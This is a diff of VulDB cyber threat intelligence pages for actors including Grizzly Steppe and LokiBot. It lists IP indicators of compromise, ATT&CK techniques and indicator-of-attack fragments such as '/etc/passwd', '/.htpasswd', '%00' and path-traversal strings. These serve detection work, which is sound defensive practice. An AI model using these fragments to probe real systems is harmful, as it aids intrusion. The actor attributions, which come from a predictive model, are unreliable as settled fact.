(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Gorgon Group - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Gorgon Group](https://vuldb.com/?actor.gorgon_group). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Gorgon Group](https://vuldb.com/?actor.gorgon_group). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.gorgon_group](https://vuldb.com/?actor.gorgon_group)
|
||||
|
||||
|
@ -37,10 +37,9 @@ ID | Type | Indicator | Confidence
|
|||
1 | File | `/uncpath/` | Medium
|
||||
2 | File | `app/controllers/frontend/PostController.php` | High
|
||||
3 | File | `www/soap/application/MCSoap/Logs.php` | High
|
||||
4 | Argument | `score` | Low
|
||||
5 | Input Value | `%00` | Low
|
||||
6 | Input Value | `::$Index_Allocation` | High
|
||||
7 | Network Port | `Web Server Port` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 4 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -52,9 +51,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Grizzly Steppe - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Grizzly Steppe](https://vuldb.com/?actor.grizzly_steppe). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Grizzly Steppe](https://vuldb.com/?actor.grizzly_steppe). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.grizzly_steppe](https://vuldb.com/?actor.grizzly_steppe)
|
||||
|
||||
|
@ -8,12 +8,12 @@ Live data and more analysis capabilities are available at [https://vuldb.com/?ac
|
|||
|
||||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Grizzly Steppe:
|
||||
|
||||
* CN
|
||||
* RU
|
||||
* US
|
||||
* LU
|
||||
* NO
|
||||
* ...
|
||||
|
||||
There are 59 more country items available. Please use our online service to access the data.
|
||||
There are 18 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -41,9 +41,113 @@ ID | IP address | Hostname | Confidence
|
|||
18 | 5.77.47.142 | - | High
|
||||
19 | 5.133.8.152 | vendorcool.com | High
|
||||
20 | 5.133.8.162 | d8162.artnet.gda.pl | High
|
||||
21 | ... | ... | ...
|
||||
21 | 5.133.179.243 | better-support4u.com | High
|
||||
22 | 5.134.1.250 | 5.134.1.250.hosted.by.stone-is.net | High
|
||||
23 | 5.135.65.145 | - | High
|
||||
24 | 5.135.65.146 | - | High
|
||||
25 | 5.135.186.35 | ns3291871.ip-5-135-186.eu | High
|
||||
26 | 5.135.199.28 | - | High
|
||||
27 | 5.149.249.172 | - | High
|
||||
28 | 5.149.254.114 | mail1.auditoriavanzada.info | High
|
||||
29 | 5.153.233.58 | - | High
|
||||
30 | 5.153.234.90 | - | High
|
||||
31 | 5.157.38.34 | - | High
|
||||
32 | 5.189.188.111 | vmd78384.contaboserver.net | High
|
||||
33 | 5.196.1.129 | vps-3d93b08b.vps.ovh.net | High
|
||||
34 | 5.196.58.96 | ip96.ip-5-196-58.eu | High
|
||||
35 | 5.199.171.58 | - | High
|
||||
36 | 5.199.172.147 | hst-172-147.cloudlix.com | High
|
||||
37 | 5.212.1.1 | - | High
|
||||
38 | 5.249.145.164 | host164-145-249-5.serverdedicati.aruba.it | High
|
||||
39 | 5.255.80.27 | srv23.mylady8.com | High
|
||||
40 | 8.39.147.120 | - | High
|
||||
41 | 23.239.10.144 | tor.shamm.as | High
|
||||
42 | 23.254.211.232 | hwsrv-930953.hostwindsdns.com | High
|
||||
43 | 27.24.190.240 | - | High
|
||||
44 | 27.50.94.251 | - | High
|
||||
45 | 31.16.91.237 | ip1f105bed.dynamic.kabel-deutschland.de | High
|
||||
46 | 31.31.72.43 | - | High
|
||||
47 | 31.132.0.11 | no.rdns.ukservers.com | High
|
||||
48 | 31.132.0.12 | no.rdns.ukservers.com | High
|
||||
49 | 31.148.219.50 | - | High
|
||||
50 | 31.148.219.166 | - | High
|
||||
51 | 31.148.219.168 | - | High
|
||||
52 | 31.148.219.176 | - | High
|
||||
53 | 31.168.172.147 | 31-168-172-147.telavivwifi.com | High
|
||||
54 | 31.186.96.19 | diburo.ru | High
|
||||
55 | 31.186.96.20 | test.diburo.ru | High
|
||||
56 | 31.192.228.185 | 31-192-228-185-static.glesys.net | High
|
||||
57 | 31.210.111.154 | . | High
|
||||
58 | 31.210.117.131 | . | High
|
||||
59 | 31.210.118.89 | . | High
|
||||
60 | 31.210.123.213 | . | High
|
||||
61 | 31.210.123.214 | . | High
|
||||
62 | 31.210.125.99 | . | High
|
||||
63 | 31.210.125.100 | . | High
|
||||
64 | 31.220.43.99 | - | High
|
||||
65 | 35.0.127.52 | tor-exit.eecs.umich.edu | High
|
||||
66 | 37.0.127.44 | bidder-quail.fellnear.net | High
|
||||
67 | 37.48.93.246 | 3906-others.noaaonline.com | High
|
||||
68 | 37.59.42.55 | dev.upyourbizz.com | High
|
||||
69 | 37.59.63.190 | ns3100645.ip-37-59-63.eu | High
|
||||
70 | 37.59.123.142 | 142.ip-37-59-123.eu | High
|
||||
71 | 37.123.130.176 | h-37-123-130-176.A183.corp.bahnhof.se | High
|
||||
72 | 37.123.130.186 | h-37-123-130-186.A183.corp.bahnhof.se | High
|
||||
73 | 37.139.52.47 | coachrobbo.com | High
|
||||
74 | 37.146.14.44 | 37-146-14-44.broadband.corbina.ru | High
|
||||
75 | 37.187.7.74 | ns3372567.ip-37-187-7.eu | High
|
||||
76 | 37.187.239.8 | 8.ip-37-187-239.eu | High
|
||||
77 | 37.187.247.3 | 3.ip-37-187-247.eu | High
|
||||
78 | 37.220.35.36 | - | High
|
||||
79 | 37.233.99.157 | - | High
|
||||
80 | 37.235.53.237 | 237.53.235.37.in-addr.arpa | High
|
||||
81 | 37.247.54.157 | - | High
|
||||
82 | 38.110.220.169 | - | High
|
||||
83 | 41.77.136.250 | - | High
|
||||
84 | 41.212.1.1 | po-0-0-0.edge1.uk-ln-TH-E.wananchi.com | High
|
||||
85 | 41.215.241.147 | - | High
|
||||
86 | 42.1.1.1 | - | High
|
||||
87 | 42.51.11.66 | - | High
|
||||
88 | 42.112.33.43 | - | High
|
||||
89 | 43.1.1.1 | - | High
|
||||
90 | 45.32.239.246 | 45.32.239.246.vultr.com | Medium
|
||||
91 | 45.55.178.34 | - | High
|
||||
92 | 45.56.90.85 | 45-56-90-85.ip.linodeusercontent.com | High
|
||||
93 | 45.62.255.94 | notassigned.cloudatcost.com | High
|
||||
94 | 45.79.85.112 | li1184-112.members.linode.com | High
|
||||
95 | 46.4.193.146 | server.netica.pl | High
|
||||
96 | 46.17.100.14 | - | High
|
||||
97 | 46.28.68.158 | a.prohoster.info | High
|
||||
98 | 46.28.110.136 | - | High
|
||||
99 | 46.28.111.122 | - | High
|
||||
100 | 46.29.248.238 | - | High
|
||||
101 | 46.73.164.160 | ip-46-73-164-160.bb.netbynet.ru | High
|
||||
102 | 46.148.17.98 | - | High
|
||||
103 | 46.148.17.99 | - | High
|
||||
104 | 46.148.17.100 | - | High
|
||||
105 | 46.148.17.210 | - | High
|
||||
106 | 46.148.26.78 | stb.fox-tv.info | High
|
||||
107 | 46.165.196.229 | - | High
|
||||
108 | 46.165.197.1 | - | High
|
||||
109 | 46.165.223.217 | - | High
|
||||
110 | 46.165.228.119 | - | High
|
||||
111 | 46.165.230.5 | tor-exit.dhalgren.org | High
|
||||
112 | 46.166.137.224 | - | High
|
||||
113 | 46.166.137.240 | - | High
|
||||
114 | 46.166.137.245 | - | High
|
||||
115 | 46.166.138.129 | - | High
|
||||
116 | 46.166.138.141 | - | High
|
||||
117 | 46.166.138.142 | - | High
|
||||
118 | 46.166.138.147 | - | High
|
||||
119 | 46.166.186.243 | tsn46-166-168-243.dyn.nltelcom.net | High
|
||||
120 | 46.166.188.228 | - | High
|
||||
121 | 46.166.190.182 | - | High
|
||||
122 | 46.166.190.192 | - | High
|
||||
123 | 46.166.190.223 | - | High
|
||||
124 | 46.242.66.240 | broadband-46-242-66-240.ip.moscow.rt.ru | High
|
||||
125 | ... | ... | ...
|
||||
|
||||
There are 600 more IOC items available. Please use our online service to access the data.
|
||||
There are 496 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -51,14 +155,12 @@ Tactics, techniques, and procedures summarize the suspected ATT&CK techniques us
|
|||
|
||||
ID | Technique | Description | Confidence
|
||||
-- | --------- | ----------- | ----------
|
||||
1 | T1008 | Algorithm Downgrade | High
|
||||
2 | T1040 | Authentication Bypass by Capture-replay | High
|
||||
3 | T1059.007 | Cross Site Scripting | High
|
||||
4 | T1068 | Execution with Unnecessary Privileges | High
|
||||
5 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
6 | ... | ... | ...
|
||||
1 | T1040 | Authentication Bypass by Capture-replay | High
|
||||
2 | T1059.007 | Cross Site Scripting | High
|
||||
3 | T1068 | Execution with Unnecessary Privileges | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 11 more TTP items available. Please use our online service to access the data.
|
||||
There are 10 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -66,19 +168,36 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `#!/system` | Medium
|
||||
2 | File | `$HOME/.forward` | High
|
||||
3 | File | `$JENKINS_HOME/jenkins.security.RekeySecretAdminMonitor/backups` | High
|
||||
4 | File | `%2a` | Low
|
||||
5 | File | `%APPDATA%` | Medium
|
||||
6 | File | `%PROGRAMDATA%\1E\Client` | High
|
||||
7 | File | `%PROGRAMDATA%\OpenVPN Connect\drivers\tap\amd64\win10` | High
|
||||
8 | File | `%PROGRAMDATA%\Psyprax32\PPScreen.ini` | High
|
||||
9 | File | `%PROGRAMFILES%\Cylance\Desktop\log` | High
|
||||
10 | File | `%PROGRAMFILES(X86)%/Aternity Information Systems/Assistant/plugins` | High
|
||||
11 | ... | ... | ...
|
||||
1 | File | `/admin/index.php?lfj=mysql&action=del` | High
|
||||
2 | File | `/authen/start/` | High
|
||||
3 | File | `/cgi-bin/luci/rc` | High
|
||||
4 | File | `/cms/ajax.php` | High
|
||||
5 | File | `/context/%2e/WEB-INF/web.xml` | High
|
||||
6 | File | `/domain/service/.ewell-known/caldav` | High
|
||||
7 | File | `/download` | Medium
|
||||
8 | File | `/etc/hosts` | Medium
|
||||
9 | File | `/formWlanSetup` | High
|
||||
10 | File | `/include/chart_generator.php` | High
|
||||
11 | File | `/modules/profile/index.php` | High
|
||||
12 | File | `/monitoring` | Medium
|
||||
13 | File | `/music/ajax.php` | High
|
||||
14 | File | `/new` | Low
|
||||
15 | File | `/pandora_console/ajax.php` | High
|
||||
16 | File | `/plugins/servlet/audit/resource` | High
|
||||
17 | File | `/plugins/servlet/project-config/PROJECT/roles` | High
|
||||
18 | File | `/proc/<pid>/status` | High
|
||||
19 | File | `/public/plugins/` | High
|
||||
20 | File | `/rest/api/1.0/render` | High
|
||||
21 | File | `/RestAPI` | Medium
|
||||
22 | File | `/secure/QueryComponent!Default.jspa` | High
|
||||
23 | File | `/src/main/java/com/dotmarketing/filters/CMSFilter.java` | High
|
||||
24 | File | `/tmp` | Low
|
||||
25 | File | `/uncpath/` | Medium
|
||||
26 | File | `/var/log/nginx` | High
|
||||
27 | File | `account.php` | Medium
|
||||
28 | ... | ... | ...
|
||||
|
||||
There are 25121 more IOA items available. Please use our online service to access the data.
|
||||
There are 240 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -91,9 +210,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -14,8 +14,8 @@ The following campaigns are known and can be associated with Inception:
|
|||
|
||||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Inception:
|
||||
|
||||
* PL
|
||||
* SV
|
||||
* IT
|
||||
* FR
|
||||
* ...
|
||||
|
||||
|
@ -61,25 +61,25 @@ ID | Type | Indicator | Confidence
|
|||
6 | File | `/domain/service/.ewell-known/caldav` | High
|
||||
7 | File | `/etc/passwd` | Medium
|
||||
8 | File | `/formAdvFirewall` | High
|
||||
9 | File | `/goods/getGoodsListByConditions/` | High
|
||||
10 | File | `/home/user/dir` | High
|
||||
11 | File | `/master/article.php` | High
|
||||
12 | File | `/mobile/SelectUsers.jsp` | High
|
||||
13 | File | `/ProteinArraySignificanceTest.json` | High
|
||||
14 | File | `/Videos/Id/hls/PlaylistId/SegmentId.SegmentContainer` | High
|
||||
15 | File | `/web` | Low
|
||||
16 | File | `4.edu.php\conn\function.php` | High
|
||||
17 | File | `abc.c` | Low
|
||||
18 | File | `admin/bad.php` | High
|
||||
19 | File | `admin/dl_sendmail.php` | High
|
||||
20 | File | `admin/edit.php` | High
|
||||
21 | File | `admin/pages/useredit.php` | High
|
||||
22 | File | `AdminBaseController.class.php` | High
|
||||
23 | File | `AlertReceiver.java` | High
|
||||
24 | File | `AndroidManifest.xml` | High
|
||||
9 | File | `/home/user/dir` | High
|
||||
10 | File | `/master/article.php` | High
|
||||
11 | File | `/mobile/SelectUsers.jsp` | High
|
||||
12 | File | `/ProteinArraySignificanceTest.json` | High
|
||||
13 | File | `/Videos/Id/hls/PlaylistId/SegmentId.SegmentContainer` | High
|
||||
14 | File | `/web` | Low
|
||||
15 | File | `4.edu.php\conn\function.php` | High
|
||||
16 | File | `abc.c` | Low
|
||||
17 | File | `admin/bad.php` | High
|
||||
18 | File | `admin/dl_sendmail.php` | High
|
||||
19 | File | `admin/edit.php` | High
|
||||
20 | File | `admin/pages/useredit.php` | High
|
||||
21 | File | `AdminBaseController.class.php` | High
|
||||
22 | File | `AlertReceiver.java` | High
|
||||
23 | File | `AndroidManifest.xml` | High
|
||||
24 | File | `apc.php` | Low
|
||||
25 | ... | ... | ...
|
||||
|
||||
There are 213 more IOA items available. Please use our online service to access the data.
|
||||
There are 212 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,9 +1,16 @@
|
|||
# KryptoCibule - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [KryptoCibule](https://vuldb.com/?actor.kryptocibule). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [KryptoCibule](https://vuldb.com/?actor.kryptocibule). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.kryptocibule](https://vuldb.com/?actor.kryptocibule)
|
||||
|
||||
## Countries
|
||||
|
||||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with KryptoCibule:
|
||||
|
||||
* CN
|
||||
* US
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
These indicators of compromise indicate associated network ressources which are known to be part of research and attack activities of KryptoCibule.
|
||||
|
@ -22,9 +29,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -242,12 +242,15 @@ ID | Type | Indicator | Confidence
|
|||
5 | File | `/ecma/operations/ecma-objects.c` | High
|
||||
6 | File | `/GetCopiedFile` | High
|
||||
7 | File | `/hdf5/src/H5T.c` | High
|
||||
8 | File | `/leave_system/classes/Login.php` | High
|
||||
9 | File | `/risque/administration/referentiel/json/create/categorie` | High
|
||||
10 | File | `/rsms/` | Low
|
||||
11 | ... | ... | ...
|
||||
8 | File | `/jerry-core/ecma/operations/ecma-get-put-value.c` | High
|
||||
9 | File | `/jerry-core/ecma/operations/ecma-typedarray-object.c` | High
|
||||
10 | File | `/leave_system/classes/Login.php` | High
|
||||
11 | File | `/plugin` | Low
|
||||
12 | File | `/rest/collectors/1.0/template/custom` | High
|
||||
13 | File | `/risque/administration/referentiel/json/create/categorie` | High
|
||||
14 | ... | ... | ...
|
||||
|
||||
There are 80 more IOA items available. Please use our online service to access the data.
|
||||
There are 115 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
# Lokibot - Cyber Threat Intelligence
|
||||
# LokiBot - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Lokibot](https://vuldb.com/?actor.lokibot). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [LokiBot](https://vuldb.com/?actor.lokibot). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.lokibot](https://vuldb.com/?actor.lokibot)
|
||||
|
||||
## Countries
|
||||
|
||||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Lokibot:
|
||||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with LokiBot:
|
||||
|
||||
* ES
|
||||
* US
|
||||
|
@ -17,7 +17,7 @@ There are 12 more country items available. Please use our online service to acce
|
|||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
These indicators of compromise indicate associated network ressources which are known to be part of research and attack activities of Lokibot.
|
||||
These indicators of compromise indicate associated network ressources which are known to be part of research and attack activities of LokiBot.
|
||||
|
||||
ID | IP address | Hostname | Confidence
|
||||
-- | ---------- | -------- | ----------
|
||||
|
@ -38,46 +38,75 @@ ID | IP address | Hostname | Confidence
|
|||
15 | 54.225.78.40 | ec2-54-225-78-40.compute-1.amazonaws.com | Medium
|
||||
16 | 54.225.165.85 | ec2-54-225-165-85.compute-1.amazonaws.com | Medium
|
||||
17 | 54.225.245.108 | ec2-54-225-245-108.compute-1.amazonaws.com | Medium
|
||||
18 | 54.235.88.121 | ec2-54-235-88-121.compute-1.amazonaws.com | Medium
|
||||
19 | 63.141.228.141 | mxrotation8.rotationmarketingssl.com.br | High
|
||||
20 | 63.250.40.204 | house-including.quarantine-pnap-vlan51.web-hosting.com | High
|
||||
21 | ... | ... | ...
|
||||
18 | ... | ... | ...
|
||||
|
||||
There are 65 more IOC items available. Please use our online service to access the data.
|
||||
There are 68 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
Tactics, techniques, and procedures summarize the suspected ATT&CK techniques used by Lokibot. This data is unique as it uses our predictive model for actor profiling.
|
||||
Tactics, techniques, and procedures summarize the suspected ATT&CK techniques used by LokiBot. This data is unique as it uses our predictive model for actor profiling.
|
||||
|
||||
ID | Technique | Description | Confidence
|
||||
-- | --------- | ----------- | ----------
|
||||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | T1211 | 7PK Security Features | High
|
||||
5 | ... | ... | ...
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 8 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
These indicators of attack list the potential fragments used for technical activities like reconnaissance, exploitation, privilege escalation, and exfiltration by Lokibot. This data is unique as it uses our predictive model for actor profiling.
|
||||
These indicators of attack list the potential fragments used for technical activities like reconnaissance, exploitation, privilege escalation, and exfiltration by LokiBot. This data is unique as it uses our predictive model for actor profiling.
|
||||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `%SYSTEMDRIVE%\ProgramData\exclusions.dat` | High
|
||||
2 | File | `.htaccess` | Medium
|
||||
3 | File | `/.htpasswd` | Medium
|
||||
4 | File | `/1/?type=productinfo&S_id=140` | High
|
||||
5 | File | `/?module=metadata§ion=cpanel&page=list_filetypes` | High
|
||||
6 | File | `/academico/aluno/esqueci-minha-senha/` | High
|
||||
7 | File | `/adm/syscmd.asp` | High
|
||||
8 | File | `/admin/` | Low
|
||||
9 | File | `/admin/config.php?display=disa&view=form` | High
|
||||
10 | File | `/admin/loginc.php` | High
|
||||
11 | ... | ... | ...
|
||||
1 | File | `/.htpasswd` | Medium
|
||||
2 | File | `/1/?type=productinfo&S_id=140` | High
|
||||
3 | File | `/academico/aluno/esqueci-minha-senha/` | High
|
||||
4 | File | `/admin/config.php?display=disa&view=form` | High
|
||||
5 | File | `/admin/syslog` | High
|
||||
6 | File | `/api/blade-log/api/list` | High
|
||||
7 | File | `/api/resource/Item?fields` | High
|
||||
8 | File | `/aterm_httpif.cgi/negotiate` | High
|
||||
9 | File | `/attachments.php` | High
|
||||
10 | File | `/category_view.php` | High
|
||||
11 | File | `/cgi-bin/wapopen` | High
|
||||
12 | File | `/cms?section=manage_settings&action=edit` | High
|
||||
13 | File | `/contingency/servlet/ServletFileDownload` | High
|
||||
14 | File | `/data/inc/images.php` | High
|
||||
15 | File | `/docs/captcha_(number).jpeg` | High
|
||||
16 | File | `/etc/keystone/user-project-map.json` | High
|
||||
17 | File | `/etc/sysctl.d/10-ptrace.conf` | High
|
||||
18 | File | `/forum/` | Low
|
||||
19 | File | `/goform/SystemCommand` | High
|
||||
20 | File | `/index.php/admin/admin_manage/add.html` | High
|
||||
21 | File | `/index.php/newsletter/subscriber/new/` | High
|
||||
22 | File | `/knowage/restful-services/documentnotes/saveNote` | High
|
||||
23 | File | `/magnoliaAuthor/.magnolia/` | High
|
||||
24 | File | `/main.php` | Medium
|
||||
25 | File | `/newsDia.php` | Medium
|
||||
26 | File | `/objects/getSpiritsFromVideo.php` | High
|
||||
27 | File | `/owa/auth/logon.aspx` | High
|
||||
28 | File | `/product` | Medium
|
||||
29 | File | `/reports-viewScriptReport.view` | High
|
||||
30 | File | `/restapi/v1/certificates/FFM-SSLInspect` | High
|
||||
31 | File | `/romfile.cfg` | Medium
|
||||
32 | File | `/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet` | High
|
||||
33 | File | `/system/WCore/WHelper.php` | High
|
||||
34 | File | `/tmp` | Low
|
||||
35 | File | `/tmp/speedtest_urls.xml` | High
|
||||
36 | File | `/uncpath/` | Medium
|
||||
37 | File | `/var/www/xms/cleanzip.sh` | High
|
||||
38 | File | `/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php` | High
|
||||
39 | File | `/webconsole/APIController` | High
|
||||
40 | File | `/webconsole/Controller` | High
|
||||
41 | File | `AACExtractor.cpp` | High
|
||||
42 | File | `add_comment.php` | High
|
||||
43 | File | `admin.htm` | Medium
|
||||
44 | ... | ... | ...
|
||||
|
||||
There are 1133 more IOA items available. Please use our online service to access the data.
|
||||
There are 384 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -103,4 +132,4 @@ The following articles explain our unique predictive cyber threat intelligence:
|
|||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Moafee - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Moafee](https://vuldb.com/?actor.moafee). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Moafee](https://vuldb.com/?actor.moafee). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.moafee](https://vuldb.com/?actor.moafee)
|
||||
|
||||
|
